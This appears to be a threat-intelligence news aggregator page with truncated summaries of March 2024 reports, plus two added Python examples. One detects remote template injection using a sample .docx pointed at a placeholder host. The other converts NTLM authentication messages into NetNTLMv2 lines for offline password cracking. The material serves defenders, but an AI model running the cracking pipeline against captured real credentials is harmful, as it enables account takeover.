The proliferation of programmable logic controllers (PLCs) with embedded Web servers has given attackers a way to launch potentially catastrophic remote attacks against operational technology (OT) in industrial control systems (ICS) across critical infrastructure sectors.

To highlight the threat, a team of researchers from the Georgia Institute of Technology has developed malware that an adversary could use to remotely access an embedded Web server within a PLC, and attack the underlying physical system.…

Mar 05, 2024 | Newsroom | Malware / Artificial Intelligence

More than 225,000 logs containing compromised OpenAI ChatGPT credentials were made available for sale on underground markets between January and October 2023, new findings from Group-IB show.

These credentials were found within information stealer logs associated with LummaC2, Raccoon, and RedLine stealer malware.…

Key Takeaways

The Kroll Cyber Threat Intelligence (CTI) team discovered new malware resembling the VBScript-based BABYSHARK malware that we’ve called TODDLERSHARK.
The malware was used in post-compromise activity following exploitation of a ScreenConnect application.
BABYSHARK has been associated, by several sources, with a threat actor Kroll tracks as KTA082 (Kimsuky).
The…

Published On: 2024-03-05

EXECUTIVE SUMMARY

At CYFIRMA, our commitment is to provide timely insights into prevalent threats and malicious tactics affecting both organizations and individuals. Our research team recently identified a malicious .docx file linked to the stego-campaign, revealing a sophisticated cyber threat.

This campaign utilizes template injection in a Microsoft Office document to bypass traditional email security measures.…
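Remote template injection works by pointing the document's attached-template relationship (in word/_rels/settings.xml.rels, a Relationship whose Type ends in /attachedTemplate with TargetMode="External") at a remote location, so a macro-free .docx that passes attachment filtering fetches a macro-bearing template when Word opens it. The following is an added example written for this page, not code from CYFIRMA or from the campaign it describes: it builds two constructed .docx files in memory (the URL example.invalid and the user name jdoe are placeholders) and flags the one whose attached template lives off the local machine, while leaving the ordinary local Normal.dotm reference alone.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE_SUFFIX = "/attachedTemplate"


def is_remote(target):
    """True for targets that resolve off-host: http(s), UNC, or file://server/share.
    file:///C:/... (a local drive path) is how a legitimate Normal.dotm is referenced."""
    t = target.lower()
    if t.startswith(("http://", "https://", "\\\\")):
        return True
    if t.startswith("file:"):
        rest = t[5:].lstrip("/")
        return not (len(rest) > 1 and rest[1] == ":")
    return False


def external_relationships(docx_bytes):
    """Return (rels_part, rel_type, target) for every TargetMode="External" relationship
    under word/_rels/. Hyperlinks are external too, so callers filter on the type."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    hits.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return hits


def remote_template_targets(docx_bytes):
    """Attached-template targets that point off the local machine: the injection pattern."""
    return [target for _, rtype, target in external_relationships(docx_bytes)
            if rtype.endswith(ATTACHED_TEMPLATE_SUFFIX) and is_remote(target)]


def is_template_injection(docx_bytes):
    return bool(remote_template_targets(docx_bytes))


# Constructed sample documents (not files from the campaign): a minimal OOXML package
# whose settings.xml carries <w:attachedTemplate r:id="rId1"/> resolved through settings.xml.rels.
SETTINGS_XML = (
    '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    '<w:attachedTemplate r:id="rId1"/></w:settings>'
)


def make_docx(template_target, target_mode="External"):
    rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        f'Target="{template_target}" TargetMode="{target_mode}"/></Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/settings.xml", SETTINGS_XML)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


MALICIOUS_DOCX = make_docx("http://example.invalid/update/template.dotm")   # placeholder host
BENIGN_DOCX = make_docx("file:///C:/Users/jdoe/AppData/Roaming/Microsoft/Templates/Normal.dotm")

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        print(label, is_template_injection(doc), remote_template_targets(doc))
```

The check deliberately keys on the relationship type rather than on every external target, because hyperlinks and linked images are external by design; a mail gateway that blocks any .docx with an external relationship would reject a large share of legitimate documents.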

The hacking group known as TA577 has recently shifted tactics by using phishing emails to steal NT LAN Manager (NTLM) authentication hashes to perform account hijacks.

TA577 is considered an initial access broker (IAB), previously associated with Qbot and linked to Black Basta ransomware infections.

Email security firm Proofpoint reports today that, although TA577 has recently favored deploying Pikabot, two recent attack waves demonstrate a different tactic.…

Last updated at Tue, 05 Mar 2024 22:21:55 GMT

Overview

In February 2024, Rapid7’s vulnerability research team identified two new vulnerabilities affecting JetBrains TeamCity CI/CD server:

CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS base score of 9.8 (Critical).…

U.S. cybersecurity and intelligence agencies have warned of Phobos ransomware attacks targeting government and critical infrastructure entities, outlining the various tactics and techniques the threat actors have adopted to deploy the file-encrypting malware.

“Structured as a ransomware as a service (RaaS) model, Phobos ransomware actors have targeted entities including municipal and county governments, emergency services, education, public healthcare, and critical infrastructure to successfully ransom several million in U.S.…

March 04, 2024

Tommy Madjar, Kelsey Merriman, Selena Larson and the Proofpoint Threat Research Team

What happened

Proofpoint identified notable cybercriminal threat actor TA577 using a new attack chain to demonstrate an uncommonly observed objective: stealing NT LAN Manager (NTLM) authentication information. This activity can be used for sensitive information gathering purposes and to enable follow-on activity.…
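What the victim host hands over when it is coaxed into authenticating to an attacker-controlled server (the objective described in both the BleepingComputer summary above and this Proofpoint post) is not the NT hash itself but an NTLMv2 challenge-response: the NtChallengeResponse field of the NTLM AUTHENTICATE (Type 3) message, computed over a server challenge the attacker chose. That pair is what gets cracked offline or relayed. The following added example, written for this page and not code from Proofpoint or from TA577's tooling, constructs such a Type 3 message, parses it using the field layout from MS-NLMP, and emits the NetNTLMv2 line that offline cracking tools consume. The user jdoe, domain CORP, challenge and response bytes are all made up.

```python
import struct

SIGNATURE = b"NTLMSSP\x00"
AUTHENTICATE = 3
# Order of the six length/maxlen/offset descriptors that follow the message type (MS-NLMP 2.2.1.3).
FIELD_ORDER = ("lm_response", "nt_response", "domain", "user", "workstation", "session_key")


def build_authenticate(user, domain, workstation, nt_response, flags=0x00088205):
    """Assemble an NTLM AUTHENTICATE message. Used here only to construct sample input."""
    parts = [
        b"",                           # empty LM response (NTLMv2 clients send 0 or 24 bytes)
        nt_response,                   # NTLMv2 response: 16-byte NTProofStr followed by the blob
        domain.encode("utf-16-le"),
        user.encode("utf-16-le"),
        workstation.encode("utf-16-le"),
        b"",                           # no encrypted session key
    ]
    offset = 8 + 4 + 8 * len(parts) + 4   # fixed header is 64 bytes; payload starts right after
    descriptors = b""
    for part in parts:
        descriptors += struct.pack("<HHI", len(part), len(part), offset)
        offset += len(part)
    return SIGNATURE + struct.pack("<I", AUTHENTICATE) + descriptors + struct.pack("<I", flags) + b"".join(parts)


def parse_authenticate(msg):
    """Extract the variable-length fields of a Type 3 message by following each descriptor's offset."""
    if len(msg) < 64 or msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != AUTHENTICATE:
        raise ValueError("not an NTLM AUTHENTICATE message")
    fields = {}
    for i, name in enumerate(FIELD_ORDER):
        length, _maxlen, offset = struct.unpack_from("<HHI", msg, 12 + 8 * i)
        if offset + length > len(msg):
            raise ValueError(f"{name} field runs past the end of the message")
        fields[name] = msg[offset:offset + length]
    for name in ("domain", "user", "workstation"):
        fields[name] = fields[name].decode("utf-16-le")
    fields["flags"] = struct.unpack_from("<I", msg, 60)[0]
    return fields


def netntlmv2_line(fields, server_challenge):
    """Format user::domain:server_challenge:NTProofStr:blob, the NetNTLMv2 input used by
    offline cracking tools (hashcat mode 5600 / john netntlmv2)."""
    nt = fields["nt_response"]
    if len(nt) <= 24:
        raise ValueError("24-byte response is NTLMv1/LMv2, not an NTLMv2 challenge-response")
    ntproofstr, blob = nt[:16], nt[16:]
    return "{}::{}:{}:{}:{}".format(fields["user"], fields["domain"],
                                    server_challenge.hex(), ntproofstr.hex(), blob.hex())


# Constructed sample values, not a capture from any real campaign.
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")          # chosen by the attacker's server
NTPROOFSTR = bytes.fromhex("aa" * 16)                          # HMAC-MD5 output in a real exchange
BLOB = (bytes.fromhex("0101000000000000")                     # RespType, HiRespType, reserved
        + bytes(8)                                             # timestamp
        + bytes.fromhex("1122334455667788")                    # client challenge
        + bytes(4)                                             # reserved
        + bytes(4)                                             # AV_PAIR list: MsvAvEOL only
        + bytes(4))                                            # reserved
SAMPLE_MSG = build_authenticate("jdoe", "CORP", "WS01", NTPROOFSTR + BLOB)

if __name__ == "__main__":
    print(netntlmv2_line(parse_authenticate(SAMPLE_MSG), SERVER_CHALLENGE))
```

Because the server challenge is the attacker's own, the captured line can be fed straight to a cracker; the only defences at the victim's end are preventing the outbound authentication in the first place (blocking egress SMB and restricting outgoing NTLM to remote servers) and making the underlying password strong enough that offline cracking fails.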

Security researcher HaxRob discovered a previously unknown Linux backdoor named GTPDOOR, designed for covert operations within mobile carrier networks.

The threat actors behind GTPDOOR are believed to target systems adjacent to the GPRS roaming eXchange (GRX), such as SGSN, GGSN, and P-GW, which can provide the attackers direct access to a telecom’s core network.…

Key Takeaways

In February 2023, we detected an intrusion that was initiated by a user downloading and executing a file from a SEO-poisoned search result, leading to a Gootloader infection.
Around nine hours after the initial infection, the Gootloader malware facilitated the deployment of a Cobalt Strike beacon payload directly into the host’s registry, and then executed it in memory.…

New research from Recorded Future’s Insikt Group examines newly discovered infrastructure related to the operators of Predator, a mercenary mobile spyware. This infrastructure is believed to be in use in at least eleven countries, including Angola, Armenia, Botswana, Egypt, Indonesia, Kazakhstan, Mongolia, Oman, the Philippines, Saudi Arabia, and Trinidad and Tobago.…

In October 2023, the network of a Darktrace customer was targeted with ALPHV, or BlackCat, ransomware. An investigation into the attack revealed the usage of methods associated with the Nitrogen campaign, such as ‘malvertising’ and the distribution of malicious Python packages.

As-a-Service malware trending

Throughout the course of 2023, “as-a-Service” strains of malware remained the most consistently observed threat type to affect Darktrace customers, mirroring their overall prominence across the cyber threat landscape.…

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware.…
